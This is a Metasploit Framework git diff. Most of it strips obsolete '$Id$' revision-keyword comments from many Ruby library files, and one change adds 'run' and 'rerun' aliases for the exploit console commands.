diff --git a/lib/msf/base/sessions/command_shell_options.rb b/lib/msf/base/sessions/command_shell_options.rb index 028ce427ab..a170e6f4f5 100644 --- a/lib/msf/base/sessions/command_shell_options.rb +++ b/lib/msf/base/sessions/command_shell_options.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # This file is part of the Metasploit Framework and may be subject to diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 2f8b79580a..84b827933d 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' require 'msf/base/sessions/scriptable' diff --git a/lib/msf/base/sessions/meterpreter_java.rb b/lib/msf/base/sessions/meterpreter_java.rb index c92e58e782..2c393c31fd 100644 --- a/lib/msf/base/sessions/meterpreter_java.rb +++ b/lib/msf/base/sessions/meterpreter_java.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index c44b8c6f5e..16942f0270 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'shellwords' diff --git a/lib/msf/base/sessions/meterpreter_php.rb b/lib/msf/base/sessions/meterpreter_php.rb index 2ba47c2c03..98e564567b 100644 --- a/lib/msf/base/sessions/meterpreter_php.rb +++ b/lib/msf/base/sessions/meterpreter_php.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_x86_bsd.rb b/lib/msf/base/sessions/meterpreter_x86_bsd.rb index 1f851e270c..d6fb7b27d8 100644 --- a/lib/msf/base/sessions/meterpreter_x86_bsd.rb +++ b/lib/msf/base/sessions/meterpreter_x86_bsd.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_x86_linux.rb b/lib/msf/base/sessions/meterpreter_x86_linux.rb index 33e72d1be9..45ba0b910a 100644 --- a/lib/msf/base/sessions/meterpreter_x86_linux.rb +++ b/lib/msf/base/sessions/meterpreter_x86_linux.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_x86_win.rb b/lib/msf/base/sessions/meterpreter_x86_win.rb index 2f44f0e640..c3ec8ee2cc 100644 --- a/lib/msf/base/sessions/meterpreter_x86_win.rb +++ b/lib/msf/base/sessions/meterpreter_x86_win.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' require 'msf/windows_error' diff --git a/lib/msf/base/sessions/tty.rb b/lib/msf/base/sessions/tty.rb index acaad4629d..400deedc56 100644 --- a/lib/msf/base/sessions/tty.rb +++ b/lib/msf/base/sessions/tty.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' diff --git a/lib/msf/base/sessions/vncinject_options.rb b/lib/msf/base/sessions/vncinject_options.rb index 1ae2954ceb..80d4930abe 100644 --- a/lib/msf/base/sessions/vncinject_options.rb +++ b/lib/msf/base/sessions/vncinject_options.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf module Sessions diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb index 3e2b0aff30..7b31207d63 100644 --- a/lib/msf/base/simple/buffer.rb +++ b/lib/msf/base/simple/buffer.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb index 59357b1255..7415993b76 100644 --- a/lib/msf/base/simple/payload.rb +++ b/lib/msf/base/simple/payload.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' diff --git a/lib/msf/core/auxiliary/commandshell.rb b/lib/msf/core/auxiliary/commandshell.rb index ae145c81be..72963b59af 100644 --- a/lib/msf/core/auxiliary/commandshell.rb +++ b/lib/msf/core/auxiliary/commandshell.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/command_shell_options' diff --git a/lib/msf/core/auxiliary/login.rb b/lib/msf/core/auxiliary/login.rb index 3072a44907..88012bca00 100644 --- a/lib/msf/core/auxiliary/login.rb +++ b/lib/msf/core/auxiliary/login.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/auxiliary/pii.rb b/lib/msf/core/auxiliary/pii.rb index 3630f08835..9f50b9d17f 100644 --- a/lib/msf/core/auxiliary/pii.rb +++ b/lib/msf/core/auxiliary/pii.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -### -# $Id$ -### module Msf diff --git a/lib/msf/core/auxiliary/rservices.rb b/lib/msf/core/auxiliary/rservices.rb index 25671464df..737b3415c6 100644 --- a/lib/msf/core/auxiliary/rservices.rb +++ b/lib/msf/core/auxiliary/rservices.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index 2cdf6a66a1..afccaab26d 100755 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core' diff --git a/lib/msf/core/exploit/browser_autopwn.rb b/lib/msf/core/exploit/browser_autopwn.rb index f4b63f8251..1ee518d714 100644 --- a/lib/msf/core/exploit/browser_autopwn.rb +++ b/lib/msf/core/exploit/browser_autopwn.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb index c99d29064f..4cb43ff7e1 100644 --- a/lib/msf/core/exploit/cmdstager.rb +++ b/lib/msf/core/exploit/cmdstager.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/cmdstager' require 'msf/core/exploit/exe' diff --git a/lib/msf/core/exploit/cmdstager_debug_asm.rb b/lib/msf/core/exploit/cmdstager_debug_asm.rb index 508307a25d..41b9bd43c8 100644 --- a/lib/msf/core/exploit/cmdstager_debug_asm.rb +++ b/lib/msf/core/exploit/cmdstager_debug_asm.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_debug_write.rb b/lib/msf/core/exploit/cmdstager_debug_write.rb index 8b73ac8adf..964a5e8d00 100644 --- a/lib/msf/core/exploit/cmdstager_debug_write.rb +++ b/lib/msf/core/exploit/cmdstager_debug_write.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_tftp.rb b/lib/msf/core/exploit/cmdstager_tftp.rb index 5549a687bd..aae3b0bf2b 100644 --- a/lib/msf/core/exploit/cmdstager_tftp.rb +++ b/lib/msf/core/exploit/cmdstager_tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'msf/core/exploit/tftp' diff --git a/lib/msf/core/exploit/cmdstager_vbs.rb b/lib/msf/core/exploit/cmdstager_vbs.rb index 1247d118a7..05ae9acc74 100644 --- a/lib/msf/core/exploit/cmdstager_vbs.rb +++ b/lib/msf/core/exploit/cmdstager_vbs.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb index b6a082a2a1..3a19611a2e 100644 --- a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb +++ b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id: $ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/dhcp.rb b/lib/msf/core/exploit/dhcp.rb index 455c204d84..baac9dec9f 100644 --- a/lib/msf/core/exploit/dhcp.rb +++ b/lib/msf/core/exploit/dhcp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/dhcp' diff --git a/lib/msf/core/exploit/egghunter.rb b/lib/msf/core/exploit/egghunter.rb index 31db349cc1..20fc6f0988 100644 --- a/lib/msf/core/exploit/egghunter.rb +++ b/lib/msf/core/exploit/egghunter.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/egghunter' diff --git a/lib/msf/core/exploit/exe.rb b/lib/msf/core/exploit/exe.rb index e4d632d0ef..49ee94e3e5 100644 --- a/lib/msf/core/exploit/exe.rb +++ b/lib/msf/core/exploit/exe.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/fmtstr.rb b/lib/msf/core/exploit/fmtstr.rb index 7de70ff6e9..39ea610dce 100644 --- a/lib/msf/core/exploit/fmtstr.rb +++ b/lib/msf/core/exploit/fmtstr.rb @@ -7,7 +7,6 @@ module Msf # in a more intelligent way. # # Author: jduck -# $Id$ ### module Exploit::FormatString diff --git a/lib/msf/core/exploit/ipv6.rb b/lib/msf/core/exploit/ipv6.rb index 7be24e6aec..d6f81faf8d 100644 --- a/lib/msf/core/exploit/ipv6.rb +++ b/lib/msf/core/exploit/ipv6.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 709457ffa0..431488690d 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # All exploit mixins should be added to the list below # diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index b86e51e9a9..e8dd2ac0bf 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # This file is part of the Metasploit Framework and may be subject to diff --git a/lib/msf/core/exploit/omelet.rb b/lib/msf/core/exploit/omelet.rb index 41d7905fd4..e5945812a6 100644 --- a/lib/msf/core/exploit/omelet.rb +++ b/lib/msf/core/exploit/omelet.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/omelet' diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index 630d8dc579..9f3c4777d6 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/php_exe.rb b/lib/msf/core/exploit/php_exe.rb index 3c59f568ed..0a768a436e 100644 --- a/lib/msf/core/exploit/php_exe.rb +++ b/lib/msf/core/exploit/php_exe.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/riff.rb b/lib/msf/core/exploit/riff.rb index 3681c0f2bf..57b7b167af 100644 --- a/lib/msf/core/exploit/riff.rb +++ b/lib/msf/core/exploit/riff.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/telnet.rb b/lib/msf/core/exploit/telnet.rb index 8a7655055f..ba0b65bf24 100644 --- a/lib/msf/core/exploit/telnet.rb +++ b/lib/msf/core/exploit/telnet.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/tftp.rb b/lib/msf/core/exploit/tftp.rb index c20250f5d8..a75ab290f4 100644 --- a/lib/msf/core/exploit/tftp.rb +++ b/lib/msf/core/exploit/tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/tftp' diff --git a/lib/msf/core/exploit/wbemexec.rb b/lib/msf/core/exploit/wbemexec.rb index 660d29f45d..a8e8e89d01 100644 --- a/lib/msf/core/exploit/wbemexec.rb +++ b/lib/msf/core/exploit/wbemexec.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## # # This mixin enables executing arbitrary commands via the diff --git a/lib/msf/core/payload/windows/exec.rb b/lib/msf/core/payload/windows/exec.rb index 5ad8a42568..5e3f9b510a 100644 --- a/lib/msf/core/payload/windows/exec.rb +++ b/lib/msf/core/payload/windows/exec.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/payload/windows/loadlibrary.rb b/lib/msf/core/payload/windows/loadlibrary.rb index 05854d12df..dc128e3d18 100644 --- a/lib/msf/core/payload/windows/loadlibrary.rb +++ b/lib/msf/core/payload/windows/loadlibrary.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index 0a112be7f7..f831730fe1 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: module.rb 12624 2011-05-15 23:51:53Z hdm $ -## module Msf module RPC diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index f2d536ac17..9c7327002b 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -33,7 +33,9 @@ class Exploit "exploit" => "Launch an exploit attempt", "rcheck" => "Reloads the module and checks if the target is vulnerable", "rexploit" => "Reloads the module and launches an exploit attempt", - "reload" => "Just reloads the module" + "reload" => "Just reloads the module", + "run" => "Alias for exploit", + "rerun" => "Alias for rexploit", }) end @@ -197,6 +199,8 @@ class Exploit end end + alias cmd_run cmd_exploit + def cmd_exploit_help print_line "Usage: exploit [options]" print_line @@ -204,6 +208,8 @@ class Exploit print @@exploit_opts.usage end + alias cmd_run_help cmd_exploit_help + # # Reloads an exploit module and checks the target to see if it's # vulnerable. @@ -227,6 +233,8 @@ class Exploit end end + alias cmd_rerun cmd_rexploit + def cmd_rexploit_help print_line "Usage: rexploit [options]" print_line @@ -234,6 +242,8 @@ class Exploit print @@exploit_opts.usage end + alias cmd_rerun_help cmd_rexploit_help + # # Picks a reasonable payload and minimally configures it # diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb index 8b6a248384..65a41f1650 100644 --- a/lib/msf/ui/console/command_dispatcher/payload.rb +++ b/lib/msf/ui/console/command_dispatcher/payload.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/parser/arguments' diff --git a/lib/msf/windows_error.rb b/lib/msf/windows_error.rb index 94053f8e52..42c2d175fa 100644 --- a/lib/msf/windows_error.rb +++ b/lib/msf/windows_error.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## # # Windows system error codes (0-499) diff --git a/lib/rex/elfparsey.rb b/lib/rex/elfparsey.rb index a9f891066a..abe5e626ee 100644 --- a/lib/rex/elfparsey.rb +++ b/lib/rex/elfparsey.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfParsey diff --git a/lib/rex/elfparsey/elf.rb b/lib/rex/elfparsey/elf.rb index 9d9811f6d5..33061fe6e4 100644 --- a/lib/rex/elfparsey/elf.rb +++ b/lib/rex/elfparsey/elf.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/elfparsey/elfbase' require 'rex/elfparsey/exceptions' require 'rex/image_source' diff --git a/lib/rex/elfparsey/elfbase.rb b/lib/rex/elfparsey/elfbase.rb index be5691e2d8..d91ba7aee1 100644 --- a/lib/rex/elfparsey/elfbase.rb +++ b/lib/rex/elfparsey/elfbase.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/struct2' module Rex diff --git a/lib/rex/elfparsey/exceptions.rb b/lib/rex/elfparsey/exceptions.rb index 4e3804424f..5437246afe 100644 --- a/lib/rex/elfparsey/exceptions.rb +++ b/lib/rex/elfparsey/exceptions.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfParsey diff --git a/lib/rex/elfscan.rb b/lib/rex/elfscan.rb index d3e66affbc..38c9706690 100644 --- a/lib/rex/elfscan.rb +++ b/lib/rex/elfscan.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan diff --git a/lib/rex/elfscan/scanner.rb b/lib/rex/elfscan/scanner.rb index 115aa0977d..244ee7e728 100644 --- a/lib/rex/elfscan/scanner.rb +++ b/lib/rex/elfscan/scanner.rb @@ -1,7 +1,5 @@ # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan module Scanner diff --git a/lib/rex/elfscan/search.rb b/lib/rex/elfscan/search.rb index 80f7be017c..cb0e9292f1 100644 --- a/lib/rex/elfscan/search.rb +++ b/lib/rex/elfscan/search.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan module Search diff --git a/lib/rex/exploitation/cmdstager/tftp.rb b/lib/rex/exploitation/cmdstager/tftp.rb index 3607fb4ea7..e646e291f1 100644 --- a/lib/rex/exploitation/cmdstager/tftp.rb +++ b/lib/rex/exploitation/cmdstager/tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'rex/arch' diff --git a/lib/rex/exploitation/jsobfu.rb b/lib/rex/exploitation/jsobfu.rb index 2c8d51299a..32bc87f640 100644 --- a/lib/rex/exploitation/jsobfu.rb +++ b/lib/rex/exploitation/jsobfu.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'rkelly' diff --git a/lib/rex/image_source.rb b/lib/rex/image_source.rb index 1cf4a94a8d..f7f3ff1c44 100644 --- a/lib/rex/image_source.rb +++ b/lib/rex/image_source.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ImageSource diff --git a/lib/rex/image_source/disk.rb b/lib/rex/image_source/disk.rb index 0b3f5faa83..f37b7be47f 100644 --- a/lib/rex/image_source/disk.rb +++ b/lib/rex/image_source/disk.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source/image_source' require 'rex/struct2' diff --git a/lib/rex/image_source/image_source.rb b/lib/rex/image_source/image_source.rb index 549388fc4e..4d6e428e06 100644 --- a/lib/rex/image_source/image_source.rb +++ b/lib/rex/image_source/image_source.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ImageSource class ImageSource diff --git a/lib/rex/image_source/memory.rb b/lib/rex/image_source/memory.rb index c75be1881f..3f27990324 100644 --- a/lib/rex/image_source/memory.rb +++ b/lib/rex/image_source/memory.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source/image_source' require 'rex/struct2' diff --git a/lib/rex/ole.rb b/lib/rex/ole.rb index d2a0407134..38f6f4924a 100644 --- a/lib/rex/ole.rb +++ b/lib/rex/ole.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/clsid.rb b/lib/rex/ole/clsid.rb index e697dd121d..b6458c903e 100644 --- a/lib/rex/ole/clsid.rb +++ b/lib/rex/ole/clsid.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/difat.rb b/lib/rex/ole/difat.rb index 52ab121b4c..825a1089b4 100644 --- a/lib/rex/ole/difat.rb +++ b/lib/rex/ole/difat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/directory.rb b/lib/rex/ole/directory.rb index 4b91038686..464a073ebd 100644 --- a/lib/rex/ole/directory.rb +++ b/lib/rex/ole/directory.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/direntry.rb b/lib/rex/ole/direntry.rb index c6f634691a..a546a6e32b 100644 --- a/lib/rex/ole/direntry.rb +++ b/lib/rex/ole/direntry.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/fat.rb b/lib/rex/ole/fat.rb index 2edb3de8ac..0adc2aa30d 100644 --- a/lib/rex/ole/fat.rb +++ b/lib/rex/ole/fat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/header.rb b/lib/rex/ole/header.rb index b24eef4e31..a6341e7636 100644 --- a/lib/rex/ole/header.rb +++ b/lib/rex/ole/header.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/minifat.rb b/lib/rex/ole/minifat.rb index 1e9bbdb0e3..df2b073582 100644 --- a/lib/rex/ole/minifat.rb +++ b/lib/rex/ole/minifat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/propset.rb b/lib/rex/ole/propset.rb index 8a1812d96c..f5c94a602a 100644 --- a/lib/rex/ole/propset.rb +++ b/lib/rex/ole/propset.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/storage.rb b/lib/rex/ole/storage.rb index 55f6259a60..fc6a15797a 100644 --- a/lib/rex/ole/storage.rb +++ b/lib/rex/ole/storage.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/stream.rb b/lib/rex/ole/stream.rb index fd7e36d050..8d2ea7f3d5 100644 --- a/lib/rex/ole/stream.rb +++ b/lib/rex/ole/stream.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/substorage.rb b/lib/rex/ole/substorage.rb index 1e14440853..b60a8714fb 100644 --- a/lib/rex/ole/substorage.rb +++ b/lib/rex/ole/substorage.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/util.rb b/lib/rex/ole/util.rb index 5712e598c8..90da72d3c9 100644 --- a/lib/rex/ole/util.rb +++ b/lib/rex/ole/util.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/peparsey.rb b/lib/rex/peparsey.rb index 6e6addffe7..22916826fd 100644 --- a/lib/rex/peparsey.rb +++ b/lib/rex/peparsey.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeParsey diff --git a/lib/rex/peparsey/exceptions.rb b/lib/rex/peparsey/exceptions.rb index 45951f8322..359b2807fd 100644 --- a/lib/rex/peparsey/exceptions.rb +++ b/lib/rex/peparsey/exceptions.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeParsey diff --git a/lib/rex/peparsey/pe.rb b/lib/rex/peparsey/pe.rb index 3966e06f0b..de895159e3 100644 --- a/lib/rex/peparsey/pe.rb +++ b/lib/rex/peparsey/pe.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source' require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' diff --git a/lib/rex/peparsey/pe_memdump.rb b/lib/rex/peparsey/pe_memdump.rb index 85f118f8c7..eef2ab7a53 100644 --- a/lib/rex/peparsey/pe_memdump.rb +++ b/lib/rex/peparsey/pe_memdump.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source' require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' diff --git a/lib/rex/peparsey/pebase.rb b/lib/rex/peparsey/pebase.rb index bf268e6b36..5a3e5247b9 100644 --- a/lib/rex/peparsey/pebase.rb +++ b/lib/rex/peparsey/pebase.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/peparsey/exceptions' require 'rex/struct2' diff --git a/lib/rex/peparsey/section.rb b/lib/rex/peparsey/section.rb index 392b42f067..8110cc071e 100644 --- a/lib/rex/peparsey/section.rb +++ b/lib/rex/peparsey/section.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' require 'rex/struct2' diff --git a/lib/rex/pescan.rb b/lib/rex/pescan.rb index 163c6f0db5..9483abc15f 100644 --- a/lib/rex/pescan.rb +++ b/lib/rex/pescan.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeScan diff --git a/lib/rex/proto/dhcp.rb b/lib/rex/proto/dhcp.rb index 9a8a036f84..d28ae0bf8b 100644 --- a/lib/rex/proto/dhcp.rb +++ b/lib/rex/proto/dhcp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # DHCP Server support written by scriptjunkie # diff --git a/lib/rex/proto/dhcp/constants.rb b/lib/rex/proto/dhcp/constants.rb index c99d74f1bc..96e2829691 100644 --- a/lib/rex/proto/dhcp/constants.rb +++ b/lib/rex/proto/dhcp/constants.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/dhcp' module Rex diff --git a/lib/rex/proto/dhcp/server.rb b/lib/rex/proto/dhcp/server.rb index abfd39d2d0..1dccbc0c09 100644 --- a/lib/rex/proto/dhcp/server.rb +++ b/lib/rex/proto/dhcp/server.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/socket' require 'rex/proto/dhcp' diff --git a/lib/rex/proto/ntlm/crypt.rb b/lib/rex/proto/ntlm/crypt.rb index f7a99efcfb..3885f29b85 100644 --- a/lib/rex/proto/ntlm/crypt.rb +++ b/lib/rex/proto/ntlm/crypt.rb @@ -43,10 +43,6 @@ # The latter has a minor bug in its separate_keys function. # The third key has to begin from the 14th character of the # input string instead of 13th:) -#-- -# $Id: ntlm.rb 11678 2011-01-30 19:26:35Z hdm $ -#++ - require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/base' diff --git a/lib/rex/proto/ntlm/message.rb b/lib/rex/proto/ntlm/message.rb index a8c678e877..efe5f7ec4d 100644 --- a/lib/rex/proto/ntlm/message.rb +++ b/lib/rex/proto/ntlm/message.rb @@ -40,9 +40,6 @@ # The latter has a minor bug in its separate_keys function. # The third key has to begin from the 14th character of the # input string instead of 13th:) -#-- -# $Id: ntlm.rb 11678 2011-01-30 19:26:35Z hdm $ -#++ #this module defines the message class , useful for easily handling type 1/2/3 ntlm messages diff --git a/lib/rex/proto/rfb.rb b/lib/rex/proto/rfb.rb index 378bc1428b..623f780b29 100644 --- a/lib/rex/proto/rfb.rb +++ b/lib/rex/proto/rfb.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id: $ # # RFB protocol support # diff --git a/lib/rex/proto/rfb.rb.ut.rb b/lib/rex/proto/rfb.rb.ut.rb index d06de6c4d2..cb9900de64 100644 --- a/lib/rex/proto/rfb.rb.ut.rb +++ b/lib/rex/proto/rfb.rb.ut.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- # -# $Id: $ -# # RFB protocol support # # @author Joshua J. Drake diff --git a/lib/rex/proto/rfb/cipher.rb b/lib/rex/proto/rfb/cipher.rb index 7a0c37dbdb..ca54d19a2e 100644 --- a/lib/rex/proto/rfb/cipher.rb +++ b/lib/rex/proto/rfb/cipher.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/rfb/client.rb b/lib/rex/proto/rfb/client.rb index 723a067034..fd75160953 100644 --- a/lib/rex/proto/rfb/client.rb +++ b/lib/rex/proto/rfb/client.rb @@ -1,7 +1,4 @@ # -*- coding: 